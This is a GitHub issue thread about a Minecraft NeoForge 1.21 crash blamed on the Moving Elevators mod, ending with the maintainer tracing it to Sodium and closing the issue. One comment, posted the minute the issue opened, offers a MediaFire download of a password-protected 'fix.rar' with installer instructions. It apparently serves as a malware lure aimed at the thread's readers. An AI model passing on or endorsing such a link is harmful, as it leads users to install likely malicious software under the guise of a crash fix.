### ISSUE TITLE
[Crash] ...neoforge 1.21 

### ISSUE THREAD

**Issue by MstDominik** [SuperMartijn642/MovingElevators#232] opened 2024-08-26 17:06 UTC
**Version Info**
- Minecraft, ... 1.21 Neoforge 21.0.167
- Moving Elevators, ... movingelevators-1.4.7b-neoforge-mc1.21 
- And im using latest lib for the mod u can see below too :
(supermartijn642configlib-1.1.8-neoforge-mc1.21),
(supermartijn642corelib-1.1.17f-neoforge-mc1.21).
**Are you using OptiFine?**: ... im using Iris mod

**Steps to Reproduce**
... when I add moving elevator mod, the game does not start, just crash if i remove this mod the modpack works completely

**Crash report (~/logs/latest.log)**
...---- Minecraft Crash Report ----
[latest.log](https://github.com/user-attachments/files/16761394/latest.log)

**Comment by TechnoSpelie** [comment] 2024-08-26 17:06
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SuperMartijn642** [comment] 2024-08-26 22:21
Please fill in the template, the template is there for a reason. What version of Moving Elevators are you using? When did the crash occur, what are the steps to reproduce it?

As far as I can tell, this crash has nothing to do with Moving Elevators. It appears the crash is caused by a mixin to `RenderType` failing. Moving Elevators does not mixin into `RenderType`.
The real cause is likely printed earlier in the log. Could you share the `logs/latest.log` rather than just the crash log?
Does the crash go away if you disable Moving Elevators?

**Comment by MstDominik** [comment] 2024-08-27 11:31
here is the log as requested im add the mod and game crashes i cant even go in main menu of minecraft

**Comment by SuperMartijn642** [comment] 2024-09-02 14:46
The crash seems to be due to Sodium. This should now be fixed in Moving Elevators version 1.0.8.
Thank you for reporting the issue!

**Closed as completed by SuperMartijn642** 2024-09-02 14:46 UTC
Labels: crash
